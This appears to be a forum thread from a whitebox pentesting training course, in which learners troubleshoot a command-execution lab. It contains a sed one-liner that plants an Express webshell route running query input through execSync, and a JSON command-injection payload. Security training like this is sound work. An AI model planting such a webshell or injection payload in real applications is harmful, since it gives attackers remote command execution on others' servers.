Intro to whitebox pentesting - Command Execution

Hello,

I’m looking for help for the Command Execution portion of this module. The task is to write a new API route into the app.js file to create a webshell.

I cannot for the life of me get this working at all locally. Without using the API, I can confirm this command works to rewrite the app.js

sed -i '17i\app.get("/api/cmd", (req, res) => {const cmd = require("child_process").execSync(req.query.cmd).toString(); res.send(cmd);});' src/app.js

Afterwards I can run a GET request to the endpoint to read files.

Whenever I try to do it in the app, all I get are syntax errors. I’ve tried escaping, modifying the syntax, using other ways, but I can’t get it to work.

This command injection gives me this feedback

{"text":"'}) + require('child_process').execSync('sed -i '17i\app.get("/api/cmd", (req, res) => {const cmd = require("child_process").execSync(req.query.cmd).toString(); res.send(cmd);});'\" src/app.js')//

}

{“message”:“Bad escaped character in JSON at position 62 (line 1 column 63)”}

Sometimes, I can get the API to give me a normal response, but then the file isn’t overwritten at all. Very lost here.

Hey,

DM me, i remember it pretty well and it was hard.
this is due to syntax most of the time.
It’s easier to do it with a python script as the command won’t get the syntax messed up.

Just sharing that using python for syntax highlighting was the way to go! Solved it now

I have solved the exercise. I have played with Burp instead of Curl. The sed command and the following payload provided by HTB Academy I have converted to Base64 to avoid problems with escaping quotes and other special characters:

 app.get("/api/cmd", (req, res) => { const cmd = require("child_process").execSync(req.query.cmd).toString(); res.send(cmd); });

If anyone needs help, you can ask for it.